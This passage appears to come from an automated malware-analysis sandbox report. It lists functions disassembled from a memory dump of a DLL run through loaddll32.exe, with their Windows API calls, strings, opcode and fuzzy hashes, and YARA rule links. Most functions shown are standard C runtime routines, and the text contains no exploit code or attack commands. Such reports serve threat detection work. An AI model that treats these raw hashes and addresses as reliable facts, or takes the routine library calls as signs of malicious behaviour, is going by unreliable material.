    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Name::operator+$shared_ptr
    • String ID:
    • API String ID: 1037112749-0
    • Opcode ID: 85ee0d4c35ca8cbdfee6785217d5f9520651aa244aba59cf70b67a3f4176c568
    • Instruction ID: 8cc7a12e431c3729dda3184b6bb2bc2c53b86a3efcb060568d8263b3794ea76b
    • Opcode Fuzzy Hash: 85ee0d4c35ca8cbdfee6785217d5f9520651aa244aba59cf70b67a3f4176c568
    • Instruction Fuzzy Hash: BF515471904328ABDF0DCFA4D855EEEBBB8EF48714F02445AE605A7580FB709A44CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D529B8B, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 150COMMON
    Download Yara Rule
    APIs
    • FindFirstChangeNotificationW.KERNEL32(6D5765F0,00000001,00000002,00000001,00000000,?,00000000,?,?,6D52A9C8,?,00000001,00000000,?,00000001,00000000), ref: 6D529BAC
    • GetEnvironmentVariableW.KERNEL32(pos,6D5765F0,0000046C,?,00000000,?,?,6D52A9C8,?,00000001,00000000,?,00000001,00000000,?,00000001), ref: 6D529C4C
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ChangeEnvironmentFindFirstNotificationVariable
    • String ID: T@Wm$p@Wm$pos$|@Wm
    • API String ID: 3880921956-625402339
    • Opcode ID: 9493a9e2ba7cc660259aae52545f3e680d20d35343845b78211e0c9e58bfcdc3
    • Instruction ID: 056b6ea205a3d9f54d750bf959eb7774311ffb0b00422237921ebc2038dbc496
    • Opcode Fuzzy Hash: 9493a9e2ba7cc660259aae52545f3e680d20d35343845b78211e0c9e58bfcdc3
    • Instruction Fuzzy Hash: DF51EFB25442218FCF18CF28E8847B577F1F79B202B27462AE8559BF94F7745848CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52E680, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
    Download Yara Rule
    APIs
    • _ValidateLocalCookies.LIBCMT ref: 6D52E6B7
    • ___except_validate_context_record.LIBVCRUNTIME ref: 6D52E6BF
    • _ValidateLocalCookies.LIBCMT ref: 6D52E748
    • __IsNonwritableInCurrentImage.LIBCMT ref: 6D52E773
    • _ValidateLocalCookies.LIBCMT ref: 6D52E7C8
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 1170836740-1018135373
    • Opcode ID: 2c23aa4282f84cb853648c5d7e7ae1e2889f627aaa8b6dbe748fd4cdbc798f27
    • Instruction ID: f94f3fed9b4fdd98a0b42d5a7c117e4e1fabbabe57137155f48bfc45716e9551
    • Opcode Fuzzy Hash: 2c23aa4282f84cb853648c5d7e7ae1e2889f627aaa8b6dbe748fd4cdbc798f27
    • Instruction Fuzzy Hash: B041F634A042499FCF08CF78C880AAE7BB5BF45318F188555E924DBBD1DB31E909CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D53327D, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: NameName::
    • String ID: %lf$A
    • API String ID: 1333004437-43661536
    • Opcode ID: 8b9d1b8d5eff98fbf91ae3781094df10960077b78d2d241304f1f26e54b28624
    • Instruction ID: 00a28af2d3f94d9731373130d1b5d8fe4acdc91d99ed917487ff96fa34ed6ece
    • Opcode Fuzzy Hash: 8b9d1b8d5eff98fbf91ae3781094df10960077b78d2d241304f1f26e54b28624
    • Instruction Fuzzy Hash: DD31BF70D08268DFEF0DCFE8C844A9DBBB4BF06344F02845EE541ABA80EBB49845CB01
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D546CFC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: C:\Windows\SYSTEM32\loaddll32.exe$nTm
    • API String ID: 0-1147561974
    • Opcode ID: 2f6822bea930d50e168ac42fd03f2e528d99322be2ca1eb18cb2879d2a0d7441
    • Instruction ID: 4dd8a12ea6d2bd152bb2ee82b1c6aa1c2ae69237d60635b04c6d44a03256f2f7
    • Opcode Fuzzy Hash: 2f6822bea930d50e168ac42fd03f2e528d99322be2ca1eb18cb2879d2a0d7441
    • Instruction Fuzzy Hash: FF21C27160830ABFA7199EA58C80AEB77ADEF41368701CA24E91897950E730EC5087E2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D548BE2, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: api-ms-$ext-ms-
    • API String ID: 0-537541572
    • Opcode ID: fdf945a7d7c27e4a934a3cc50ffb85f1ad3259895fbfe2a211812f45e508dd09
    • Instruction ID: e104195a36241c2f6cf32de74cfb38b75895c99db78d9499ec9cb6f28871afe4
    • Opcode Fuzzy Hash: fdf945a7d7c27e4a934a3cc50ffb85f1ad3259895fbfe2a211812f45e508dd09
    • Instruction Fuzzy Hash: 86212E31946122EBDB1686288E80B5A3F78AF467A0F11C922FD56FFA90D730DC0085E3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54DD2B, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D54DA16: _free.LIBCMT ref: 6D54DA3B
    • _free.LIBCMT ref: 6D54DD79
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54DD84
    • _free.LIBCMT ref: 6D54DD8F
    • _free.LIBCMT ref: 6D54DDE3
    • _free.LIBCMT ref: 6D54DDEE
    • _free.LIBCMT ref: 6D54DDF9
    • _free.LIBCMT ref: 6D54DE04
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: d917ed618925ab323780e785bb5292540701fc50299451549717a17e1d811044
    • Instruction ID: 16db910f52149eadc1801a1ea706ac2b01935ffaaeaf18ded109503b97d09394
    • Opcode Fuzzy Hash: d917ed618925ab323780e785bb5292540701fc50299451549717a17e1d811044
    • Instruction Fuzzy Hash: 26118431549B04A6D724ABB1CC05FDF779D5FC0704F8A8826E39EB7860D734BE044652
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D550AC2, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON
    Download Yara Rule
    APIs
    • GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6D550B0A
    • __fassign.LIBCMT ref: 6D550CE9
    • __fassign.LIBCMT ref: 6D550D06
    • WriteFile.KERNEL32(?,6D54A1AC,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D550D4E
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D550D8E
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D550E3A
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FileWrite__fassign$ConsoleErrorLast
    • String ID:
    • API String ID: 4031098158-0
    • Opcode ID: 104a07d221855a7471fb0e4b82bc0c078631e9990f0a88d939f08d9e7a22752c
    • Instruction ID: 54c17366915b58e660ff94afe6c41bdded4c44db8c9dff32a138fca38f688fa4
    • Opcode Fuzzy Hash: 104a07d221855a7471fb0e4b82bc0c078631e9990f0a88d939f08d9e7a22752c
    • Instruction Fuzzy Hash: 03D1CB70D042599FCF1ACFA9C880AEDBBB5BF49318F24406BE815BB641D730AE52CB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D537D45, Relevance: 9.2, APIs: 6, Instructions: 221COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 6D537DD5
    • _free.LIBCMT ref: 6D537DF0
    • _free.LIBCMT ref: 6D537DFB
    • _free.LIBCMT ref: 6D537F08
      • Part of subcall function 6D545D30: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6D54375B,00000001,00000364,00000007,000000FF,?,?,?,6D5438E3,6D54385A), ref: 6D545D71
    • _free.LIBCMT ref: 6D537EDD
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D537EFE
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$Heap$AllocateErrorFreeLast
    • String ID:
    • API String ID: 4150789928-0
    • Opcode ID: 41f5404957b6b5bb0fce2f01edb9279a0868b1a3df203dbb85d9a896354ffbe4
    • Instruction ID: d931446e554923726cd1dd4474b34480857c40b6679f911b4449b9adb53167f7
    • Opcode Fuzzy Hash: 41f5404957b6b5bb0fce2f01edb9279a0868b1a3df203dbb85d9a896354ffbe4
    • Instruction Fuzzy Hash: 93515D76E08222EBDB0D8F7898506BA77A5DF85314F574859EA41DBA40FB319E06C3A0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D535C28, Relevance: 9.1, APIs: 6, Instructions: 120COMMON
    Download Yara Rule
    APIs
    • DName::operator+.LIBCMT ref: 6D535C6C
    • DName::operator+.LIBCMT ref: 6D535C78
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::operator+=.LIBCMT ref: 6D535D38
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53469F
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53495D
      • Part of subcall function 6D530454: DName::operator+.LIBCMT ref: 6D530475
    • DName::operator+.LIBCMT ref: 6D535CF3
      • Part of subcall function 6D5305BD: DName::operator=.LIBVCRUNTIME ref: 6D5305DE
    • DName::DName.LIBVCRUNTIME ref: 6D535D5C
    • DName::operator+.LIBCMT ref: 6D535D68
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
    • String ID:
    • API String ID: 2795783184-0
    • Opcode ID: 22668d5699a88a05d573f2b6aa507f801ede4299453663ae4342e487a131d7b4
    • Instruction ID: 1f2e6ae3bfcfd5a6626498bfe94e201aedd3ab2de3c378f47c6da629dcc98f77
    • Opcode Fuzzy Hash: 22668d5699a88a05d573f2b6aa507f801ede4299453663ae4342e487a131d7b4
    • Instruction Fuzzy Hash: 344192B0A043686FDF09CFA8C894BBE7BF5AF46304F525859D2859BA50F7749E40CB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5349E6, Relevance: 9.1, APIs: 6, Instructions: 95COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D535D7E: Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    • DName::operator=.LIBVCRUNTIME ref: 6D534A8C
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53469F
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53495D
    • DName::operator+.LIBCMT ref: 6D534A47
    • DName::operator+.LIBCMT ref: 6D534A53
    • DName::DName.LIBVCRUNTIME ref: 6D534AA0
    • DName::operator+.LIBCMT ref: 6D534AAF
    • DName::operator+.LIBCMT ref: 6D534ABB
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
    • String ID:
    • API String ID: 955152517-0
    • Opcode ID: c064d4699e858c50e14667cc1418b747083d0c70852ab021ad7803743cd2cfda
    • Instruction ID: 814d33db8aa8146a644f6b06ec32224fabd496cf99d5e9e4908289157b3e4564
    • Opcode Fuzzy Hash: c064d4699e858c50e14667cc1418b747083d0c70852ab021ad7803743cd2cfda
    • Instruction Fuzzy Hash: 9331B2719043649FCB0CCF98D490AEEBBF9EF99304F02485EE68697A40F7359A04CB54
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52EB4D, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(00000001,?,6D52E60D,6D52A335,6D52A779,?,6D52A9B1,?,00000001,?,?,00000001,?,6D571DA8,0000000C,6D52AAB3), ref: 6D52EB5B
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D52EB69
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D52EB82
    • SetLastError.KERNEL32(00000000,6D52A9B1,?,00000001,?,?,00000001,?,6D571DA8,0000000C,6D52AAB3,?,00000001,?), ref: 6D52EBD4
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: 44c2bddc8d512aa9484242b186d3cb60c12eb9932d5ddd9967fd97f0965b1984
    • Instruction ID: 800b50aebc63435a2d98185fd5eb020afc386178abb9eebf843a45a1d35bdb7a
    • Opcode Fuzzy Hash: 44c2bddc8d512aa9484242b186d3cb60c12eb9932d5ddd9967fd97f0965b1984
    • Instruction Fuzzy Hash: E001F53210C3329EAE0D1675EC84F1A2BAAFB573B9733062DE121D5CD0FF2148149389
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D533FF3, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 178COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: operator+shared_ptr
    • String ID: ,USm
    • API String ID: 864562889-54669491
    • Opcode ID: f8fe2a28acc816c4e56bc0a1e67699eacf95a6e717e9d7d5b4ba943a37fc3af6
    • Instruction ID: e6d48c2bcd28b55d3042e41fafb4d8ad4cbeccda08525800f681af05b2093f61
    • Opcode Fuzzy Hash: f8fe2a28acc816c4e56bc0a1e67699eacf95a6e717e9d7d5b4ba943a37fc3af6
    • Instruction Fuzzy Hash: 2B614D7190422AAECF09CFA8C844AAE7FB5FB4A345F02C969E4549BA11F772D601CF51
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D556A9F, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95COMMON
    Download Yara Rule
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,6D5896FA,00000104), ref: 6D556AFC
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FileModuleName
    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
    • API String ID: 514040917-4022980321
    • Opcode ID: 35cbaf549ee73478a99abd3c1688a5d1119366c28feb21c1240938d25c091fb8
    • Instruction ID: d874984aaec64a1a45f53d407199336c876f9c18e68d240b4ab5069a4dae1046
    • Opcode Fuzzy Hash: 35cbaf549ee73478a99abd3c1688a5d1119366c28feb21c1240938d25c091fb8
    • Instruction Fuzzy Hash: A5213B3694439636DE1E55218C44FAB7B6C8BE3368B060926FD05E2D11F721CA25C2E2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D53648D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
    Download Yara Rule
    APIs
    • FreeLibrary.KERNEL32(00000000,?,?,6D53654E,00000000,?,00000001,00000000,?,6D536681,00000001,FlsFree,6D56ABAC,FlsFree,00000000), ref: 6D53651D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FreeLibrary
    • String ID: api-ms-
    • API String ID: 3664257935-2084034818
    • Opcode ID: 2ba2d2e58f428aa8c002e7847253d6e637a6a5eac4f61d8e8adfc34843c860f0
    • Instruction ID: 426b599f5b4ce936f257fa4e4158f1f96369b24e0305c01b445ed3bb43ebeb40
    • Opcode Fuzzy Hash: 2ba2d2e58f428aa8c002e7847253d6e637a6a5eac4f61d8e8adfc34843c860f0
    • Instruction Fuzzy Hash: 0D11C632A44332ABDF168B688C44B5D77B4AF02771F534A35F910E7A84F770E90086E1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52A170, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46COMMON
    Download Yara Rule
    APIs
    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D52A17C
      • Part of subcall function 6D529F31: std::exception::exception.LIBCONCRT ref: 6D529F3E
      • Part of subcall function 6D52E171: RaiseException.KERNEL32(E06D7363,00000001,00000003,6D528974,?,00000000,?,6D528974,00000018,6D571A64,00000018), ref: 6D52E1D1
    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D52A19C
      • Part of subcall function 6D529F6B: std::exception::exception.LIBCONCRT ref: 6D529F78
    • std::regex_error::regex_error.LIBCPMT ref: 6D52A1BC
      • Part of subcall function 6D529FAE: std::exception::exception.LIBCONCRT ref: 6D529FC6
    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D52A1DC
      • Part of subcall function 6D5021E7: std::exception::exception.LIBCONCRT ref: 6D5021F4
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: std::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
    • String ID: bad function call
    • API String ID: 2470674941-3612616537
    • Opcode ID: 801ba49e57b62e74b25860c53ee0a328227b5d29680fe791f5e4fbd78dba0758
    • Instruction ID: 821b17d38d87001d10ad88e0c54a7a50f43c3187920555c8d0b2ac57b33860c0
    • Opcode Fuzzy Hash: 801ba49e57b62e74b25860c53ee0a328227b5d29680fe791f5e4fbd78dba0758
    • Instruction Fuzzy Hash: FE014B78D0810CBBCF08FBF4DC55CED777DAB50100F914420EB2092999EB74AA1D8AE1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D548DA2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,6D548D5B), ref: 6D548DB1
    • GetLastError.KERNEL32(?,6D548D5B), ref: 6D548DBB
    • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 6D548DF9
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID: api-ms-$ext-ms-
    • API String ID: 3177248105-537541572
    • Opcode ID: 10a481171bc93d33bb42fd96e7019327507d639ffcb9882e3ab52af1d924ba0d
    • Instruction ID: c470a1c989f67ba8adef708dbf93257c9b843f6f01fafe8052c5c19c7d3ae72f
    • Opcode Fuzzy Hash: 10a481171bc93d33bb42fd96e7019327507d639ffcb9882e3ab52af1d924ba0d
    • Instruction Fuzzy Hash: 30F08C30644215BBEF191E61CC46F2A3E2AAB41751F508820F90CE88E1EB63DA2085E2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5373E5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
    Download Yara Rule
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6D5373B8,?,?,6D537380,?,00000001,?), ref: 6D5373FA
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D53740D
    • FreeLibrary.KERNEL32(00000000,?,?,6D5373B8,?,?,6D537380,?,00000001,?), ref: 6D537430
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
